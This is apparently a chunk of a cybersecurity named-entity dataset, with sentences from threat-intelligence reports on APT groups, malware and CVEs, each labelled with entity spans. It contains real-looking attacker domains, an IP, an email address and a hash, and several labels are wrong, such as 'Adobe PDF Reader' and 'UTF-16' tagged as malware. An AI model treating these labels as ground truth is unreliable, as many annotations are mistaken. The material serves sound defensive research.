maintaining Dexphot ’s components . While there is a very large number of vulnerable websites , we already see some that have been injected with multiple different malicious code .", "spans": {"MALWARE: Agent Smith": [[91, 102]], "THREAT_ACTOR: Numbered Panda": [[441, 455]], "ORGANIZATION: security community": [[530, 548]], "MALWARE: Dexphot": [[632, 639]]}, "info": {"id": "cyberner_stix_train_005902", "source": "cyberner_stix_train"}} {"text": "Kaspersky researchers attribute the campaign , which we call SpoiledLegacy” , to the LuckyMouse APT group (aka EmissaryPanda and APT27) . 
The malware appends encrypted data files with the .WCRY extension , drops and executes a decryptor tool , and demands $300 or $600 USD to decrypt the data .", "spans": {"ORGANIZATION: Kaspersky": [[0, 9]], "THREAT_ACTOR: LuckyMouse": [[85, 95]], "THREAT_ACTOR: EmissaryPanda": [[111, 124]], "THREAT_ACTOR: APT27)": [[129, 135]], "FILEPATH: malware": [[142, 149]], "FILEPATH: .WCRY extension": [[188, 203]]}, "info": {"id": "cyberner_stix_train_005903", "source": "cyberner_stix_train"}} {"text": "PLATINUM 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . Since that time , MoneyTaker attacked companies in California , Utah , Oklahoma , Colorado , Illinois , Missouri , South Carolina , North Carolina , Virginia and Florida .", "spans": {"THREAT_ACTOR: PLATINUM": [[0, 8]], "ORGANIZATION: specific individuals": [[82, 102]], "VULNERABILITY: zero-day exploits": [[143, 160]], "THREAT_ACTOR: MoneyTaker": [[220, 230]]}, "info": {"id": "cyberner_stix_train_005904", "source": "cyberner_stix_train"}} {"text": "Kaspersky speculates that ScarCruft could also be behind another zero-day , CVE-2016-0147 , a vulnerability in Microsoft XML Core Services that was patched in April . 
Deepen told Threatpost the group has been operating since at least since 2008 and has targeted China and US relations experts , Defense Department entities , and geospatial groups within the federal government .", "spans": {"ORGANIZATION: Kaspersky": [[0, 9]], "THREAT_ACTOR: ScarCruft": [[26, 35]], "VULNERABILITY: zero-day": [[65, 73]], "VULNERABILITY: CVE-2016-0147": [[76, 89]], "ORGANIZATION: Deepen": [[167, 173]], "ORGANIZATION: China and US relations experts": [[262, 292]], "ORGANIZATION: Defense Department": [[295, 313]], "ORGANIZATION: geospatial groups": [[329, 346]], "ORGANIZATION: federal government": [[358, 376]]}, "info": {"id": "cyberner_stix_train_005905", "source": "cyberner_stix_train"}} {"text": "On the next step this file is executed by rundll32.exe via the KlpSvc export .", "spans": {"FILEPATH: rundll32.exe": [[42, 54]], "TOOL: KlpSvc": [[63, 69]]}, "info": {"id": "cyberner_stix_train_005906", "source": "cyberner_stix_train"}} {"text": "We were a bit disappointed that we did not see traces of a true privilege escalation exploit after all this deobfuscation work , but it seems these FinFisher samples were designed to work just using UAC bypasses . APT35 typically targets military , diplomatic and government , media , energy , engineering , business services and telecommunications sectors in U.S. and the Middle East . After decoding the .png image , the loader then proceeds to initialize the key and IV used to perform AES decryption of the encrypted payload . 
This is expressed in the form of decimal digits .", "spans": {"VULNERABILITY: privilege escalation exploit": [[64, 92]], "MALWARE: FinFisher": [[148, 157]], "THREAT_ACTOR: APT35": [[214, 219]], "ORGANIZATION: military": [[238, 246]], "ORGANIZATION: diplomatic": [[249, 259]], "ORGANIZATION: government": [[264, 274]], "ORGANIZATION: media": [[277, 282]], "ORGANIZATION: energy": [[285, 291]], "ORGANIZATION: engineering": [[294, 305]], "ORGANIZATION: business services": [[308, 325]], "ORGANIZATION: telecommunications sectors": [[330, 356]]}, "info": {"id": "cyberner_stix_train_005907", "source": "cyberner_stix_train"}} {"text": "Beyond the Android app itself , other components such as the aforementioned ELF libraries have additional data-stealing capabilities . FireEye malware analysis identified source code overlaps between malware used by APT41 in May 2016 targeting of a U.S.-based game development studio and the malware observed in supply chain compromises in 2017 and 2018 . Russian citizens—journalists , software developers , politicians , researchers at universities , and artists are also targeted by Pawn Storm .", "spans": {"SYSTEM: Android": [[11, 18]], "ORGANIZATION: FireEye": [[135, 142]], "THREAT_ACTOR: APT41": [[216, 221]], "ORGANIZATION: game development": [[260, 276]], "ORGANIZATION: citizens—journalists": [[364, 384]], "ORGANIZATION: software developers": [[387, 406]], "ORGANIZATION: politicians": [[409, 420]], "ORGANIZATION: researchers at universities": [[423, 450]], "ORGANIZATION: artists": [[457, 464]], "THREAT_ACTOR: Pawn Storm": [[486, 496]]}, "info": {"id": "cyberner_stix_train_005908", "source": "cyberner_stix_train"}} {"text": "We were not able to find additional tools , but the attackers again compromised a legitimate Thai website to host their malware , in this case the student portal for a Thai University . 
CTU researchers have discovered numerous details about TG-3390 operations , including how the adversaries explore a network , move laterally , and exfiltrate data .", "spans": {"ORGANIZATION: CTU": [[186, 189]], "THREAT_ACTOR: TG-3390": [[241, 248]]}, "info": {"id": "cyberner_stix_train_005909", "source": "cyberner_stix_train"}} {"text": "Cannon acknowledges the receipt of the secondary email address by sending an email to sahro.bella7@post.cz with s.txt ( contains {SysPar = 65} string ) as the attachment , ok within the body and a subject with the unique system identifier via SMTPS from one of the three accounts from Step 1 .", "spans": {"MALWARE: Cannon": [[0, 6]], "TOOL: email": [[49, 54], [77, 82]], "EMAIL: sahro.bella7@post.cz": [[86, 106]], "FILEPATH: s.txt": [[112, 117]]}, "info": {"id": "cyberner_stix_train_005910", "source": "cyberner_stix_train"}} {"text": "] org Ties to previous activity The registrant of cdncool [ . Within hours of a user opening the malicious attachment dropping a HOMEUNIX backdoor , APT41 regained a foothold within the environment by installing PHOTO on the organization's servers across multiple geographic regions . 
We are however only aware of one instance - the exploitation of CVE-2013-0640 to deploy MiniDuke - where we believe the exploited vulnerability was a zero-day at the time that the group acquired the exploit .", "spans": {"TOOL: HOMEUNIX backdoor": [[129, 146]], "THREAT_ACTOR: APT41": [[149, 154]], "TOOL: PHOTO": [[212, 217]], "VULNERABILITY: CVE-2013-0640": [[349, 362]], "MALWARE: MiniDuke": [[373, 381]], "VULNERABILITY: zero-day": [[435, 443]], "VULNERABILITY: exploit": [[484, 491]]}, "info": {"id": "cyberner_stix_train_005911", "source": "cyberner_stix_train"}} {"text": "These additional IOCs will hopefully provide more context into the ongoing threat .", "spans": {"TOOL: IOCs": [[17, 21]]}, "info": {"id": "cyberner_stix_train_005912", "source": "cyberner_stix_train"}} {"text": "SEND_SMS - Allows the application to send SMS messages . PICKPOCKET is a credential theft tool that dumps the user's website login credentials from Chrome , Firefox , and Internet Explorer to a file . Unit 42 researchers have been tracking Gorgon Group for criminal and targeted attacks .", "spans": {"MALWARE: PICKPOCKET": [[57, 67]], "ORGANIZATION: Unit 42": [[201, 208]], "THREAT_ACTOR: Gorgon Group": [[240, 252]]}, "info": {"id": "cyberner_stix_train_005913", "source": "cyberner_stix_train"}} {"text": "These HTTP requests match known patterns for a banking Trojan named Chthonic , which is a variant of Zeus .", "spans": {"MALWARE: banking Trojan": [[47, 61]], "MALWARE: Chthonic": [[68, 76]]}, "info": {"id": "cyberner_stix_train_005914", "source": "cyberner_stix_train"}} {"text": "FakeSpy is able to check the network connectivity status by using the function isNetworkAvailable . FIN7 operations are linked to numerous intrusion attempts having targeted hundreds of companies since at least as early as 2015 . 
The attackers have used three types of malware over the years and have traditionally targeted the aerospace , energy , government , high-tech , consulting services , and chemicals / manufacturing / mining sectors .", "spans": {"MALWARE: FakeSpy": [[0, 7]], "THREAT_ACTOR: FIN7": [[100, 104]], "THREAT_ACTOR: attackers": [[234, 243]], "ORGANIZATION: aerospace": [[328, 337]], "ORGANIZATION: energy": [[340, 346]], "ORGANIZATION: government": [[349, 359]], "ORGANIZATION: high-tech": [[362, 371]], "ORGANIZATION: consulting services": [[374, 393]], "ORGANIZATION: chemicals": [[400, 409]], "ORGANIZATION: manufacturing": [[412, 425]], "ORGANIZATION: mining sectors": [[428, 442]]}, "info": {"id": "cyberner_stix_train_005915", "source": "cyberner_stix_train"}} {"text": "Below screen shot shows the posts made by the user , the hits column in the below screen shot gives an idea of number of times the links were visited ( probably by the malicious macro code ) , this can give rough idea of the number of users who are probably infected as a result of opening the malicious document .", "spans": {"TOOL: malicious macro code": [[168, 188]]}, "info": {"id": "cyberner_stix_train_005916", "source": "cyberner_stix_train"}} {"text": "In some samples deployed since March 2019 , Turla developers modified their PowerShell scripts in order to bypass the Antimalware Scan Interface (AMSI) . In this report , we'll review how the NetTraveler attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan .", "spans": {"THREAT_ACTOR: Turla": [[44, 49]], "MALWARE: NetTraveler": [[192, 203]], "VULNERABILITY: exploit": [[217, 224]], "VULNERABILITY: CVE-2012-0158": [[225, 238]], "MALWARE: NetTraveler Trojan": [[254, 272]]}, "info": {"id": "cyberner_stix_train_005917", "source": "cyberner_stix_train"}} {"text": "For more detailed information about the threat , check out the blog post from CSIS . Gallmaker may well have continued to avoid detection were it not for Symantec 's technology . . 
Lastly , we emphasize that although the samples of COSMICENERGY we obtained are potentially red team related , threat actors regularly leverage contractors and red team tools in real world threat activity , including during OT attacks .", "spans": {"ORGANIZATION: CSIS": [[78, 82]], "THREAT_ACTOR: Gallmaker": [[85, 94]], "ORGANIZATION: Symantec": [[154, 162]], "MALWARE: COSMICENERGY": [[232, 244]], "THREAT_ACTOR: threat actors": [[292, 305]], "TOOL: red team tools": [[341, 355]]}, "info": {"id": "cyberner_stix_train_005918", "source": "cyberner_stix_train"}} {"text": "The following is the code routine for video capturing . We have previously observed the admin@338 group use BUBBLEWRAP . Upon deeper investigation into the installed Helminth fileless agent , we identified a near perfect match to the OilRig campaign executed by an Iranian hacker group against 140 financial institutions in the Middle East last year , as analyzed by FireEye , Palo Alto Networks and Logrhythm . In late 2022 , Mandiant responded to a disruptive cyber physical incident in which the Russia - linked threat actor Sandworm targeted a Ukrainian critical infrastructure organization .", "spans": {"THREAT_ACTOR: admin@338 group": [[88, 103]], "TOOL: BUBBLEWRAP": [[108, 118]], "MALWARE: Helminth": [[166, 174]], "MALWARE: OilRig": [[234, 240]], "ORGANIZATION: FireEye": [[367, 374]], "ORGANIZATION: Palo Alto Networks": [[377, 395]], "ORGANIZATION: Logrhythm": [[400, 409]], "ORGANIZATION: Mandiant": [[427, 435]], "THREAT_ACTOR: disruptive cyber physical incident": [[451, 485]], "THREAT_ACTOR: Sandworm": [[528, 536]], "ORGANIZATION: Ukrainian critical infrastructure organization": [[548, 594]]}, "info": {"id": "cyberner_stix_train_005919", "source": "cyberner_stix_train"}} {"text": "These VNC exectuables would either be included in the SFX file or downloaded by the batch script . 
To make this data harvesting operation flexible , SWAnalytics equips the ability to receive and process configuration files from a remote Command-and-Control .", "spans": {"TOOL: VNC": [[6, 9]], "FILEPATH: SWAnalytics": [[149, 160]]}, "info": {"id": "cyberner_stix_train_005920", "source": "cyberner_stix_train"}} {"text": "Stage 6 : The payload is a modular spyware framework for further analysis Our journey to deobfuscating FinFisher has allowed us to uncover the complex anti-analysis techniques used by this malware , as well as to use this intel to protect our customers , which is our top priority . It was a decoy to make visitor download a \" Flash Player \" , which was in fact DownPaper malware , analyzed later in this report . The launcher then calls the backdoor DLL’s entry point . Mandiant assesses that DPRK ’s", "spans": {"MALWARE: FinFisher": [[103, 112]], "TOOL: DownPaper malware": [[362, 379]], "ORGANIZATION: Mandiant": [[471, 479]]}, "info": {"id": "cyberner_stix_train_005921", "source": "cyberner_stix_train"}} {"text": "From the sample we analyzed , attacks started from one virtual private server ( VPS ) that searches for a vulnerable machine to compromise ( previous techniques used malicious URLs or infecting legitimate websites for bot propagation ) .", "spans": {"TOOL: virtual private server": [[55, 77]], "TOOL: VPS": [[80, 83]]}, "info": {"id": "cyberner_stix_train_005922", "source": "cyberner_stix_train"}} {"text": ". The most recent NewsBeef campaign uses this toolset in conjunction with spearphishing emails , links sent over social media/standalone private messaging applications , and watering hole attacks that leverage compromised high-profile websites some belonging to the SA government . 
Molerats : Operation Molerats , Gaza Cybergang .", "spans": {"THREAT_ACTOR: NewsBeef": [[18, 26]], "THREAT_ACTOR: Molerats": [[282, 290]], "THREAT_ACTOR: Operation Molerats": [[293, 311]], "THREAT_ACTOR: Gaza Cybergang": [[314, 328]]}, "info": {"id": "cyberner_stix_train_005923", "source": "cyberner_stix_train"}} {"text": "Rather than rooting devices , the latest variant includes new virtual machine techniques that allow the malware to perform ad fraud better than ever , company researchers said in a blog post published Monday . In terms of form factor , PapaAlfa comes in two flavors : service DLL and standalone executable . However , Symantec has found no further evidence to suggest Elfin was responsible for these Shamoon attacks to date . Mandiant identified novel operational technology ( OT ) / industrial control system ( ICS)-oriented malware , which we track as COSMICENERGY , uploaded to a public malware scanning utility in December 2021 by a submitter in Russia .", "spans": {"TOOL: PapaAlfa": [[236, 244]], "TOOL: service DLL": [[268, 279]], "TOOL: standalone executable": [[284, 305]], "ORGANIZATION: Symantec": [[318, 326]], "THREAT_ACTOR: Elfin": [[368, 373]], "THREAT_ACTOR: Shamoon": [[400, 407]], "ORGANIZATION: Mandiant": [[426, 434]], "MALWARE: novel operational technology ( OT ) / industrial control system ( ICS)-oriented malware": [[446, 533]], "MALWARE: COSMICENERGY": [[554, 566]], "TOOL: public malware scanning utility": [[583, 614]]}, "info": {"id": "cyberner_stix_train_005924", "source": "cyberner_stix_train"}} {"text": "It follows Stuxnet which was used against Iran in 2010 and Industroyer which we believe was deployed by Sandworm Team against Ukraine in 2016 . 
Ke3chang has also leveraged a Java zero-day vulnerability ( CVE-2012-4681 ) , as well as older , reliable exploits for Microsoft Word ( CVE-2010-3333 ) and Adobe PDF Reader ( CVE-2010-2883 ) .", "spans": {"THREAT_ACTOR: Sandworm": [[104, 112]], "THREAT_ACTOR: Ke3chang": [[144, 152]], "TOOL: Java": [[174, 178]], "VULNERABILITY: zero-day": [[179, 187]], "VULNERABILITY: CVE-2012-4681": [[204, 217]], "FILEPATH: Microsoft Word": [[263, 277]], "VULNERABILITY: CVE-2010-3333": [[280, 293]], "MALWARE: Adobe PDF Reader": [[300, 316]], "VULNERABILITY: CVE-2010-2883": [[319, 332]]}, "info": {"id": "cyberner_stix_train_005925", "source": "cyberner_stix_train"}} {"text": "] infodavos-seaworth [ . Until the publication of the Palo Alto report , the developers of the Infy appeared to be actively updating and maintaining the codebase , and new releases were distributed to existing , as well as new , targets quite regularly . The FQDNs “ ug-co.hugesoft.org ” and “ 7cback.hugesoft.org ” are part of the “ hugesoft.org ” zone and are called “ subdomains ” of the zone . Monitor for contextual data about a file , which may include information such as name , the content ( ex : signature , headers , or data / media ) , user / ower , permissions that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": {"ORGANIZATION: Palo Alto": [[54, 63]], "TOOL: Infy": [[95, 99]], "TOOL: FQDNs": [[259, 264]], "DOMAIN: ug-co.hugesoft.org": [[267, 285]], "DOMAIN: 7cback.hugesoft.org": [[294, 313]], "DOMAIN: hugesoft.org": [[334, 346]]}, "info": {"id": "cyberner_stix_train_005926", "source": "cyberner_stix_train"}} {"text": "X-Force IRIS File name : cv_itworx.doc .", "spans": {"FILEPATH: cv_itworx.doc": [[25, 38]]}, "info": {"id": "cyberner_stix_train_005927", "source": "cyberner_stix_train"}} {"text": "The VPN package is no longer present , further reinforcing our conclusion that it was not in use . 
It's now relying on a new DNS-based attack technique to better cloak command and control communications between Greenbug and the malware \" , said Dennis Schwarz , research analyst on Arbor 's ASERT Team , in an interview with Threatpost . Both the THREEBYTE and HIGHTIDE backdoors were used in attacks targeting organizations in Taiwan ; Hybrid Identity APT29 has edited the Microsoft.IdentityServer.Servicehost.exe.config file to load a malicious DLL into the AD FS process , thereby enabling persistent access to any service federated with AD FS for a user with a specified User Principal Name .", "spans": {"TOOL: DNS-based attack technique": [[125, 151]], "ORGANIZATION: Arbor 's ASERT Team": [[282, 301]], "MALWARE: THREEBYTE": [[347, 356]], "MALWARE: HIGHTIDE backdoors": [[361, 379]], "THREAT_ACTOR: Hybrid Identity APT29": [[437, 458]]}, "info": {"id": "cyberner_stix_train_005928", "source": "cyberner_stix_train"}} {"text": "CrowdStrike Services Inc. , our Incident Response group , was called by the Democratic National Committee ( DNC ) , the formal governing body for the US Democratic Party , to respond to a suspected breach .", "spans": {"ORGANIZATION: CrowdStrike": [[0, 11]], "ORGANIZATION: Incident Response": [[32, 49]], "ORGANIZATION: Democratic National Committee": [[76, 105]], "ORGANIZATION: DNC": [[108, 111]]}, "info": {"id": "cyberner_stix_train_005929", "source": "cyberner_stix_train"}} {"text": "Figure 9 . We have not yet identified FIN7’s ultimate goal in this campaign , as we have either blocked the delivery of the malicious emails or our FaaS team detected and contained the attack early enough in the lifecycle before we observed any data targeting or theft . 
Hilename: C:\\Windows\\svchost.exe .", "spans": {"THREAT_ACTOR: FIN7’s": [[38, 44]], "MALWARE: malicious emails": [[124, 140]], "FILEPATH: C:\\Windows\\svchost.exe": [[281, 303]]}, "info": {"id": "cyberner_stix_train_005930", "source": "cyberner_stix_train"}} {"text": "The malware was first spotted by Tatyana Shishkova from Kaspersky by end October 2019 , but actually dates back to June 2019 . CIA hackers discussed what the NSA's Equation Group hackers did wrong and how the CIA's malware makers could avoid similar exposure . A similar group emerged in 2015 and was identified by Symantec as Dragonfly 2.0 .", "spans": {"ORGANIZATION: Kaspersky": [[56, 65]], "ORGANIZATION: CIA": [[127, 130]], "THREAT_ACTOR: Equation Group": [[164, 178]], "ORGANIZATION: Symantec": [[315, 323]], "THREAT_ACTOR: Dragonfly 2.0": [[327, 340]]}, "info": {"id": "cyberner_stix_train_005931", "source": "cyberner_stix_train"}} {"text": "It runs in an infinite loop , in each iteration it requests a command from the C2 , and then it sleeps for a time period it receives in the C2 response ( defaulting to 1 second if no sleep-time sent ) .", "spans": {"TOOL: C2": [[79, 81], [140, 142]]}, "info": {"id": "cyberner_stix_train_005932", "source": "cyberner_stix_train"}} {"text": "The LUNAR SPIDER threat group is the Eastern European-based operator and developer of the commodity banking malware called BokBot ( aka IcedID ) , which was first observed in April 2017 . 
Financially motivated APT groups which focus efforts on targeted attacks on the financial sector such as — Anunak , Corkow , Buhtrap — usually managed botnets using developed or modified banking Trojans .", "spans": {"THREAT_ACTOR: LUNAR SPIDER threat group": [[4, 29]], "TOOL: BokBot": [[123, 129]], "TOOL: IcedID": [[136, 142]], "ORGANIZATION: financial sector": [[268, 284]], "MALWARE: Corkow": [[304, 310]], "ORGANIZATION: banking": [[375, 382]]}, "info": {"id": "cyberner_stix_train_005933", "source": "cyberner_stix_train"}} {"text": "The malware basically provides a remote CMD/PowerShell terminal for the attackers , enabling them to execute scripts/commands and receive the results via HTTP requests . If it's Cyrillic and the command to the shell is not ‘ipconfig’ , the threat converts the command result text encoding from Cyrillic to UTF-16 .", "spans": {"MALWARE: malware": [[4, 11]], "TOOL: CMD/PowerShell": [[40, 54]], "THREAT_ACTOR: attackers": [[72, 81]], "FILEPATH: it's": [[173, 177]], "MALWARE: Cyrillic": [[178, 186]], "MALWARE: UTF-16": [[306, 312]]}, "info": {"id": "cyberner_stix_train_005934", "source": "cyberner_stix_train"}} {"text": "This suggests that this certificate might have been previously used for a similar attack against the Ukrainian Ministry of Foreign Affairs , or associated targets , although there is no documentation of such attack available to the public .", "spans": {"ORGANIZATION: Ukrainian Ministry of Foreign Affairs": [[101, 138]]}, "info": {"id": "cyberner_stix_train_005935", "source": "cyberner_stix_train"}} {"text": "Pitty Tiger group is sometimes using stolen material as spear phishing content to target other persons . 
registrant information points to activity possibly as early as 2011 .", "spans": {"THREAT_ACTOR: Pitty Tiger group": [[0, 17]]}, "info": {"id": "cyberner_stix_train_005936", "source": "cyberner_stix_train"}} {"text": "TG-3390 : api.apigmail.com .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7]], "DOMAIN: api.apigmail.com": [[10, 26]]}, "info": {"id": "cyberner_stix_train_005937", "source": "cyberner_stix_train"}} {"text": "How these recorded calls are sent to the command and control server ( CnC ) is taken care of by MainService , which is discussed next . Beginning in August 2016 , a group calling itself the Shadow Brokers began releasing tools it claimed to have originated from the Equation Group . Gamaredon Group is a threat group that has been active since at least 2013 and has targeted individuals likely involved in the Ukrainian government .", "spans": {"THREAT_ACTOR: Shadow Brokers": [[190, 204]], "THREAT_ACTOR: Equation": [[266, 274]], "THREAT_ACTOR: Gamaredon": [[283, 292]], "ORGANIZATION: Ukrainian government": [[410, 430]]}, "info": {"id": "cyberner_stix_train_005938", "source": "cyberner_stix_train"}} {"text": "Attitude Change The disinterest in the issues appears to have changed with The New York Times report , which lit a fire underneath Adups and BLU . These findings also suggest that the threat groups have robust exploit developing capabilities because CVE-2018-0798 is not widely reported on and it is typically not incorporated into publicly available weaponizers . 
C2 : blog.softfix.co.kr .", "spans": {"ORGANIZATION: New York Times": [[79, 93]], "ORGANIZATION: Adups": [[131, 136]], "ORGANIZATION: BLU": [[141, 144]], "THREAT_ACTOR: threat groups": [[184, 197]], "VULNERABILITY: CVE-2018-0798": [[250, 263]], "TOOL: C2": [[365, 367]], "DOMAIN: blog.softfix.co.kr": [[370, 388]]}, "info": {"id": "cyberner_stix_train_005939", "source": "cyberner_stix_train"}} {"text": "In doing so , the Trojan can be sure that its malicious module will be executed with system rights . Recently , Trend Micro researchers came across a new mobile malware family which we have called GnatSpy . RevengeHotels : df632e25c32e8f8ad75ed3c50dd1cd47 . Once the system is exploited , a very small downloader is dropped onto the victim - s disc that - s only 20 KB in size .", "spans": {"ORGANIZATION: Trend Micro": [[112, 123]], "TOOL: GnatSpy": [[197, 204]], "THREAT_ACTOR: RevengeHotels": [[207, 220]], "FILEPATH: df632e25c32e8f8ad75ed3c50dd1cd47": [[223, 255]]}, "info": {"id": "cyberner_stix_train_005940", "source": "cyberner_stix_train"}} {"text": "The Check Point researchers have dubbed the malware family \" HummingBad , '' but researchers from mobile security company Lookout say HummingBad is in fact Shedun , a family of auto-rooting malware that came to light last November and had already infected a large number of devices . RATANKBA is delivered to its victims using a variety of lure documents , including Microsoft Office documents , malicious CHM files , and different script downloaders . APT33 : 217.13.103.46 securityupdated.com . 
By comparison , the INDUSTROYER.V2 incidents lacked many of those same disruptive components and the malware did not feature the wiper module from the original INDUSTROYER .", "spans": {"ORGANIZATION: Check Point": [[4, 15]], "MALWARE: HummingBad": [[61, 71], [134, 144]], "ORGANIZATION: Lookout": [[122, 129]], "MALWARE: Shedun": [[156, 162]], "TOOL: RATANKBA": [[284, 292]], "TOOL: Microsoft Office documents": [[367, 393]], "TOOL: CHM files": [[406, 415]], "THREAT_ACTOR: APT33": [[453, 458]], "IP_ADDRESS: 217.13.103.46": [[461, 474]], "DOMAIN: securityupdated.com": [[475, 494]], "MALWARE: INDUSTROYER.V2": [[517, 531]], "MALWARE: malware": [[598, 605]], "MALWARE: INDUSTROYER": [[657, 668]]}, "info": {"id": "cyberner_stix_train_005941", "source": "cyberner_stix_train"}} {"text": "This information is requested within a few minutes of initial compromise and the amount of data the operator will have to deal with is quite considerable .", "spans": {}, "info": {"id": "cyberner_stix_train_005942", "source": "cyberner_stix_train"}} {"text": "RuMMS can upload responses to the balance inquiries ( received via SMS message ) to the remote C2 server , which can send back additional commands to be sent from the victim to the provider ’ s payment service . We first discovered this group in mid-2016 , although it is possible their operations extends earlier than that time frame . It is not the first time an attacker used only cloud providers . 
Since 2021 , there have been multiple leaks of ransomware source code and builders components that are essential to creating and modifying ransomware .", "spans": {"MALWARE: RuMMS": [[0, 5]], "THREAT_ACTOR: group": [[237, 242]], "TOOL: cloud providers": [[384, 399]], "VULNERABILITY: multiple leaks of ransomware source code": [[431, 471]]}, "info": {"id": "cyberner_stix_train_005943", "source": "cyberner_stix_train"}} {"text": "LATENTBOT is a modular and highly obfuscated type of malware first discovered by FireEye iSIGHT intelligence in December 2015 . According to the security firm , this campaign targeted Indian military officials via spear-phishing emails , distributing spyware to its victims via an Adobe Reader vulnerability .", "spans": {"TOOL: LATENTBOT": [[0, 9]], "ORGANIZATION: FireEye iSIGHT intelligence": [[81, 108]], "ORGANIZATION: security firm": [[145, 158]], "ORGANIZATION: military officials": [[191, 209]], "TOOL: emails": [[229, 235]], "TOOL: Adobe Reader": [[281, 293]], "VULNERABILITY: vulnerability": [[294, 307]]}, "info": {"id": "cyberner_stix_train_005944", "source": "cyberner_stix_train"}} {"text": "It then calls a routine that adds a code section to a target module . The survey contained macros that , once enabled , downloaded PupyRAT . Side-loaded DLL Anti-debugging/anti-sandboxing check for parent process name . 
Why does this matter Because nation states are well funded and super determined .", "spans": {"TOOL: PupyRAT": [[131, 138]], "TOOL: DLL": [[153, 156]], "ORGANIZATION: nation states": [[249, 262]]}, "info": {"id": "cyberner_stix_train_005945", "source": "cyberner_stix_train"}} {"text": "Another is a loader variant seen during the spring of 2010 in conjunction with both CosmicDuke and PinchDuke .", "spans": {"TOOL: loader": [[13, 19]], "MALWARE: CosmicDuke": [[84, 94]], "MALWARE: PinchDuke": [[99, 108]]}, "info": {"id": "cyberner_stix_train_005946", "source": "cyberner_stix_train"}} {"text": "Operation Daybreak appears to have been launched by APT37 to infect high profile targets through spear-phishing e-mails . The Callisto Group has been active at least since late 2015 and continues to be so , including continuing to set up new phishing infrastructure every week .", "spans": {"THREAT_ACTOR: APT37": [[52, 57]]}, "info": {"id": "cyberner_stix_train_005947", "source": "cyberner_stix_train"}} {"text": "We don't know the exact date Suckfly stole the certificates from the South Korean organizations .", "spans": {"THREAT_ACTOR: Suckfly": [[29, 36]]}, "info": {"id": "cyberner_stix_train_005948", "source": "cyberner_stix_train"}} {"text": "The vulnerability exists in the old Equation Editor ( EQNEDT32.EXE ) , a component of Microsoft Office that is used to insert and evaluate mathematical formulas . Lookout researchers have discovered a new mobile surveillanceware family , FrozenCell .", "spans": {"TOOL: Equation Editor": [[36, 51]], "MALWARE: EQNEDT32.EXE": [[54, 66]], "ORGANIZATION: Lookout": [[163, 170]], "MALWARE: FrozenCell": [[238, 248]]}, "info": {"id": "cyberner_stix_train_005949", "source": "cyberner_stix_train"}} {"text": "Broadcast receivers are components that allow you to register for various Android events . 
The 2017 leak of Equation Group tools by a mysterious group calling itself the Shadow Brokers was one of the most significant cyber security stories in recent years . Utilizing a passive listener as a communications channel is characteristic of the Winnti developers ’ foresight in needing a failsafe secondary command-and-control mechanisms .", "spans": {"SYSTEM: Android": [[74, 81]], "THREAT_ACTOR: mysterious group": [[134, 150]], "MALWARE: Winnti": [[340, 346]]}, "info": {"id": "cyberner_stix_train_005950", "source": "cyberner_stix_train"}} {"text": "The Zebrocy chain follows a pattern : spearphish attachment -> compiled Autoit script ( downloader ) -> Zebrocy payload .", "spans": {"MALWARE: Zebrocy": [[4, 11], [104, 111]], "TOOL: Autoit": [[72, 78]]}, "info": {"id": "cyberner_stix_train_005951", "source": "cyberner_stix_train"}} {"text": "We have detected several malicious programs using GCM for command and control – the widespread Trojan-SMS.AndroidOS.FakeInst.a , Trojan-SMS.AndroidOS.Agent.ao , and Trojan-SMS.AndroidOS.OpFake.a among others . The group had also targeted three different telecoms operators , all based in Southeast Asia . The string pool is never stored entirely decrypted in memory ; the field of interest is decrypted when needed and then immediately freed ( thus quickly unavailable ) . Mandiant observed the threat actor use e.exe to load d.dll into lsass process memory .", "spans": {"SYSTEM: GCM": [[50, 53]], "MALWARE: Trojan-SMS.AndroidOS.FakeInst.a": [[95, 126]], "MALWARE: Trojan-SMS.AndroidOS.Agent.ao": [[129, 158]], "MALWARE: Trojan-SMS.AndroidOS.OpFake.a": [[165, 194]], "ORGANIZATION: telecoms operators": [[254, 272]]}, "info": {"id": "cyberner_stix_train_005952", "source": "cyberner_stix_train"}} {"text": "Gooligan is a new variant of the Android malware campaign found by our researchers in the SnapPea app last year . 
We do not have evidence that the earliest targeted financial institutions were victimized by fraudulent transactions before APT38 left the compromised environments , possibly indicating that APT38 was conducting reconnaissance-only activity at that time . . It also reveals direct links to secure[.]66[.]to and zhu[.]vn , both of which also belong to Hack520 and contains his personal blog .", "spans": {"MALWARE: Gooligan": [[0, 8]], "MALWARE: SnapPea": [[90, 97]], "ORGANIZATION: financial institutions": [[165, 187]], "THREAT_ACTOR: APT38": [[238, 243], [305, 310]], "THREAT_ACTOR: Hack520": [[465, 472]]}, "info": {"id": "cyberner_stix_train_005953", "source": "cyberner_stix_train"}} {"text": "While this particular actor effectively used their almost worn out CVE-2012-0158 exploits in the past , Spring Dragon employs more involved and creative intrusive activity as well . First , Turla steals emails by forwarding all outgoing emails to the attackers .", "spans": {"THREAT_ACTOR: actor": [[22, 27]], "VULNERABILITY: CVE-2012-0158": [[67, 80]], "THREAT_ACTOR: Spring Dragon": [[104, 117]], "THREAT_ACTOR: Turla": [[190, 195]], "TOOL: emails": [[203, 209], [237, 243]]}, "info": {"id": "cyberner_stix_train_005954", "source": "cyberner_stix_train"}} {"text": "However , given the way the trojan is built , it is highly customizable , meaning that adapting it to a different language would be extremely easy . Despite the initial perception that the maldoc sample was intended for ICS or OT staff , LYCEUM has not demonstrated an interest in those environments . 
